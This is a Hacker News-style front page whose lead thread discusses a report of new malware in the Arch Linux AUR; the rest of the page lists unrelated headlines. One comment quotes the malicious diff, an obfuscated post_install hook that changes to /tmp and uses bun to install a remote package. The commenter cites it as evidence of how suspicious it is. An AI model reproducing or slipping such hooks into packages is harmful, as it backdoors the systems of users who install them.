frontpage.
newsnewestaskshowjobs

Open Source @Github

fp.

Open in hackernews

Arch Linux AUR Hit by Another Wave of Now More Sophisticated Malware Attack

https://www.phoronix.com/news/Arch-Linux-AUR-More-Malware
35•ImJamal•2h ago

Comments

7e•1h ago
Companies like Anthropic and OpenAI need to sponsor open source projects by giving them free agent credits. Otherwise, bad actors can just outspend and totally overwhelm the somewhat dim and very overworked set of human maintainers. Humans in software are obsolete, full stop.
micaeked•1h ago
Both already do that. The AUR stuff is more of a policy issue and unmatched expectations, unrelated to llms imo
cyphar•59m ago
Well, both give you 6 months of access. Out of interest I applied some time ago and (despite maintaining a few fairly important OSS projects) never got a response from them. Of the other maintainers I know, it seems to me that they decide who to give access to fairly randomly.
Shank•1h ago
Is there any information on if this is the same attack vector (orphaned packages that were adopted)? I believe they already locked down adoption, but maybe also a combination of existing maintainers being taken over?
cge•1h ago
The reported commit [1] suggests to me that it was an account compromise of some sort, not orphan+adopt: the committer is the same in git, but the contact email changes in the PKGBUILD.

This doesn't necessarily seem 'more elaborate': it is attempting to be better obfuscated against automated checks at the cost of being very obvious to anyone doing even a cursory review of the install scripts. It's also likely something that would be caught instantly by even an extremely naive LLM, as seems to have been the case here. There's simply no legitimate reason why an install script would ever do something like this:

  diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
  new file mode 100644
  index 000000000000..9806501accad
  --- /dev/null
  +++ b/htbrowser-bin-deps.install
  @@ -0,0 +1,3 @@
  +post_install() {
  +  $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
  +}

[1]: https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-b...
zootboy•47m ago
I'm not certain that the git committer tells you the full story. I don't believe the AUR enforces that the git commit email is the same as the current maintainer email. So this could have been an orphan package, adopted by a malicious user, generated a malicious commit with the previous maintainer's git info.

Unfortunately, I don't see a way of viewing the ownership history of a package in the AUR. I know you get emails with ownership changes if you're subscribed to a package, but I don't see this info in the web interface anywhere.

No, everyone is not using AI for everything

https://gabrielweinberg.com/p/people-are-consuming-ai-like-they
120•yegg•1h ago•93 comments

The Birth and Death of JavaScript (2014)

https://www.destroyallsoftware.com/talks/the-birth-and-death-of-javascript
128•subset•3h ago•68 comments

Firewood Splitting Simulator

https://screen.toys/firewood/
257•memalign•4d ago•88 comments

Measles surge in Utah sparks fears US could undo decades of progress

https://www.dailymail.com/news/article-15897903/measles-surge-utah-US-elimination-status.html
57•Bender•1h ago•11 comments

Lisp's Influence on Ruby

https://blog.tacoda.dev/lisps-influence-on-ruby-6a54f1a7740e
130•tacoda•3d ago•12 comments

FarOutCompany

https://faroutcompany.com/
46•bookofjoe•2h ago•3 comments

Caddy compatibility for zeroserve: 3x throughput and 70% lower latency

https://su3.io/posts/zeroserve-caddy-compat
57•losfair•2h ago•14 comments

Perlisisms

https://www.cs.yale.edu/homes/perlis-alan/quotes.html
15•tosh•1h ago•6 comments

The only scalable delete in Postgres is DROP TABLE

https://planetscale.com/blog/the-only-scalable-delete
41•hollylawly•2d ago•15 comments

Rio de Janeiro's city government model Rio3.5 beats Qwen3.7 in recent benchmarks

https://twitter.com/zenmagnets/status/2065796012820848699
72•lucasfcosta•1h ago•19 comments

Formal Methods and the Future of Programming

https://blog.janestreet.com/formal-methods-at-jane-street-index/?from_theconsensus=1
49•eatonphil•3h ago•9 comments

I indexed 669 GB of my GoPro videos using my M1 Max computer and local ML models

31•iliashad•1h ago•4 comments

Rio de Janeiro's "homegrown" LLM appears to be a merge of an existing model

https://github.com/nex-agi/Nex-N2/issues/4
4•unrvl22•37m ago•1 comments

Global density and biomass of arbuscular mycorrhizal fungal networks

https://www.science.org/doi/10.1126/science.adu4373
14•zdw•23h ago•0 comments

Show HN: Dual YOLOv8n UAV Detection on RK3588S at 42 FPS Using NPU

https://github.com/alebal123bal/khadas_yolov8n_multithread
13•alebal123bal•1h ago•0 comments

How did Atari apply side art to Arcade Cabinets?

https://arcadeblogger.com/2026/06/14/how-did-atari-apply-side-art-to-arcade-cabinets/
36•msephton•3h ago•4 comments

How to Earn a Billion Dollars

https://paulgraham.com/earn.html
196•kingstoned•4h ago•525 comments

Extinction-Level Capitalism

https://matthewbutterick.com/extinction-level-capitalism.html
50•laurex•1h ago•16 comments

A 'cold blob' in the Atlantic could be a sign of AMOC shutdown – CNN

https://www.cnn.com/2026/06/12/climate/cold-blob-atlantic-amoc-ocean-circulation
74•tambourine_man•1h ago•67 comments

Free SQL→ER diagram tool, runs in the browser, nothing uploaded

https://sqltoerdiagram.com/
300•robhati•12h ago•57 comments

EU Commission looking at practical consequences of Anthropic decision

https://www.reuters.com/legal/litigation/eu-commission-looking-practical-consequences-anthropic-d...
38•tartoran•1h ago•19 comments

Honda Civics and the Evil Valet

https://juniperspring.org/posts/honda-evil-valet/
357•librick•15h ago•83 comments

Show HN: 3D print Z reinforcement via injected loops

https://mgunlogson.github.io/magma/
5•mgunlogson•5d ago•5 comments

KPMG pulls report on AI usage due to apparent hallucinations

https://techcrunch.com/2026/06/13/kpmg-pulls-report-on-ai-usage-due-to-apparent-hallucinations/
51•Brajeshwar•2h ago•3 comments

Dangerous hormone-disrupting chemicals found in US breast milk samples

https://www.theguardian.com/us-news/2026/jun/14/breast-milk-research-chemicals
35•andsoitis•1h ago•3 comments

Cloud-based LLM gold rush is ending

https://automato.substack.com/p/apple-wwdc-and-the-fable-5-embargo
29•andrewstetsenko•1h ago•3 comments

UK set to announce social media ban for under-16s

https://www.manchestereveningnews.co.uk/news/uk-news/uk-set-announce-social-media-34119132
108•beejiu•1h ago•152 comments

Historic co-determination helps monasteries navigate digital change

https://phys.org/news/2026-05-historic-monasteries-digital-countries.html
62•indynz•2d ago•40 comments

Don't trust large context windows

https://garrit.xyz/posts/2026-05-06-dont-trust-large-context-windows
206•computersuck•10h ago•146 comments

Conversations with a six-year-old on functional programming (2018)

https://byorgey.wordpress.com/2018/05/06/conversations-with-a-six-year-old-on-functional-programm...
25•downbad_•2h ago•3 comments